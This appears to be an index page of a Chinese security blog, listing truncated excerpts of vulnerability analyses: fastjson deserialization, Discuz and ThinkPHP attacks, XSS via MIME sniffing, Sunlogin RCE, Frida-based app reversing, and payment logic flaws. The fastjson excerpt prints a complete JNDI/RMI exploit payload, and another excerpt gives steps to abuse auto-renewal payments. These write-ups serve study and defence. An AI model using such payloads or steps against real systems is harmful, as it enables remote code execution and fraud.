密码保护:FastJson 反序列化学习

密码保护:FastJson 反序列化学习
0x01 概述 主要是本次某*行动,据传闻有个fastjson的0day,我就很好奇,刚好自己之前没有学习过这个东西,所以蹭着这个时间把这个学习一下。 0x02 分析过程 什么是fastjson Fastjson是一个由阿里巴巴维护的一个json库。它采用一种“假定有序快速匹配”的算法,是号称Java中最快的json库。最早的通告在这里。而fastjson的用法可以先看看下面这个例子。 先定义一个User类 package com.l1nk3r.fastjson; publ...
2019年07月11日 实用工具 要查看留言请输入您的密码。 喜欢 1 阅读 2,671 views 次 阅读全文

密码保护:fastjson =< 1.2.47 反序列化漏洞浅析

密码保护:fastjson =< 1.2.47 反序列化漏洞浅析
poc {"name":{"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},"x":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://localhost:1099/Exploit","autoCommit":true}}} 最近据说爆出来一个在hw期间使用的fastjson 漏洞,该漏洞无需开启autoType即可利用成功,建议使用fastjson的用户尽快升级到> 1.2.47版本(保险起见,建议升级到最新版) 环境准备 阅读本篇文章之...
2019年07月11日 文章转载 要查看留言请输入您的密码。 喜欢 2 阅读 3,889 views 次 阅读全文

漏洞分析 | Discuz ML! V3.X 代码注入漏洞

漏洞分析 | Discuz ML! V3.X 代码注入漏洞
Discuz!ML V3.X 代码注入分析 代码来源:http://discuz.ml/download 作者:Web安全组-CoolCat 漏洞定位 在PoC的代码中填充'.1.'使得代码出错,定位出错代码文件: 代码报错 根据报错跟踪到source/module/portal/portal_index.php第32行 portal_index.php 代码 查看问题函数上方查看定义函数以及关联文件的位置,可以看到template函数在/source/function/function_core.php中,继续跟进。 函数从 524行一...
2019年07月11日 文章转载 暂无评论 喜欢 0 阅读 3,145 views 次 阅读全文

thinkPHP渗透之经验决定成败

thinkPHP渗透之经验决定成败
如上图,目标就一个登陆框,最近 Thinkphp 程序很多,根据后台地址结构,猜测可能是 ThinkPHP ,随手输入 xxx 得到 thinkPHP 报错页面,确定目标程序和版本。 然后上 5.X EXP 测试: 命令执行漏洞已经被修复了。。。 爆破?这验证码我没辙。。。 尝试读取日志瞅瞅,结果遇到防火墙 然后查了下 IP ,没有CDN,果断查下旁站,有那么几个站,目测都是 thinkPHP 爱站旁站查询其实并不准确,有的查不到,所以...
2019年07月10日 文章转载 暂无评论 喜欢 4 阅读 7,515 views 次 阅读全文

bugbounty:利用文件上传 MIME嗅探到存储型XSS

bugbounty:利用文件上传 MIME嗅探到存储型XSS
bugbounty:利用文件上传 MIME嗅探到存储型XSS 前言 在私有程序上查找漏洞时,我能够通过文件上传功能找到存储的XSS漏洞。由于滥用IE/Edge处理文件的方式,我能够绕过文件类型检查 并将恶意HTML文件创建为GIF。我还分解了文件上传过滤器,并在利用它时我会进行相应的思考。 第一步:FUZZ探测 当我开始查看新程序时,我总是喜欢的一件事是FUZZ一下文件上传的点。文件上传中的漏洞通常会给你带来高严重性错误...
2019年06月06日 文章转载 暂无评论 喜欢 0 阅读 2,108 views 次 阅读全文

sunlogin rce分析

sunlogin rce分析
sunloginl rce漏洞分析 首先分析二进制文件,拖入ida 发现被加壳,die(detect it easy)查壳发现是upx,使用github官方的upx最新版脱壳即可 1 upx -d xxx.exe 注意最新的工具脱壳后无法直接执行,应该是upx在加壳的过程中将基址存在了某个寄存器或内存中,而脱壳过程中将这段代码删除了,导致无法找到对应的基址。 但是可以拖入ida进行分析 脱壳后拖入ida进行分析,脱壳后针对于SunloginC...
2023年10月20日 文章转载 暂无评论 喜欢 0 阅读 3,561 views 次 阅读全文

密码保护:某(dewu)毒app的newSign分析过程

密码保护:某(dewu)毒app的newSign分析过程
得物NewSign分析过程 目的: 分析NewSign算法 使用到工具 jadx frida ida 该app很恶心,有些同学设置了https证书和代{过}{滤}理后,都无法抓包,是因为它在调用okhttp3的时候设置了 NO_PROXY模式 所以需要先把它干掉,不然我们抓不到包,话不多说,直接上脚本 复制代码 隐藏代码 try {     var URL = Java.use('java.net.URL')     URL.openConnection.overload('java.net.Proxy').implementation = function ...
2021年04月06日 文章转载 要查看留言请输入您的密码。 喜欢 13 阅读 8,820 views 次 阅读全文

objection 改源码解决 app的双进程保护 和 双进程保护原理 frida.core.RPCException: Error: expected a pointer

objection 改源码解决 app的双进程保护 和 双进程保护原理 frida.core.RPCException: Error: expected a pointer
采用双进程的方式,对父进程进行保护,基于信号的发送和接收,实现相互的保护防止被动态攻击。 简单的双进程保护就是从原进程再fork一个空进程出来,让逆向分析的时候附加到空进程中导致hook不上 双进程进程保护主要功能: 1、保护父进程,ptrace所有线程,防止被附加、调试、暂停; 2、保护子进程,防止被暂停、异常退出; 下面是我用objection附加双进程保护的app的时候报错,一般双进程保护,先把app关掉直...
2021年04月06日 文章转载 暂无评论 喜欢 3 阅读 9,572 views 次 阅读全文

安卓10无人直播

安卓10无人直播
起因 今天玩着王者农药、突然女神给我来视频了,可是我正在打游戏呀。我国服花木兰怎么可以挂机!!! 最后这局我胜利了,但是我失去了一个女神。心里很失落,于是我想出了一个想法。如果每次女神给我视频 我都是接了 陪她说话、唱歌给她听,那就可以很容易上位了,对,没错的。 流程 首先看一下安卓视频直播的流程(图片网上百度的) 可以看出来、获取数据的源头其实就是在摄像头哪里、至于后面的各种流...
2021年04月06日 文章转载 暂无评论 喜欢 2 阅读 7,660 views 次 阅读全文

逻辑漏洞之我见

逻辑漏洞之我见
签约漏洞 出现场景 自动续费、自动扣费签约,支付时跳转到支付宝等支付界面 通常出现在活动界面的会员优惠开通,支付后比正常购买优惠才算是漏洞。 实现步骤 1、A手机登陆账号A打开要测试的业务,点击自动续费,支付时停留在支付界面 2、B手机登陆账号A打开要测试的业务,点击自动续费,支付时停留在支付界面 3、A点击支付并进行签约,支付成功后在第三方APP中解除支付界面 4、B点击支付并进行签约,支付成...
2021年03月29日 文章转载 暂无评论 喜欢 4 阅读 2,599 views 次 阅读全文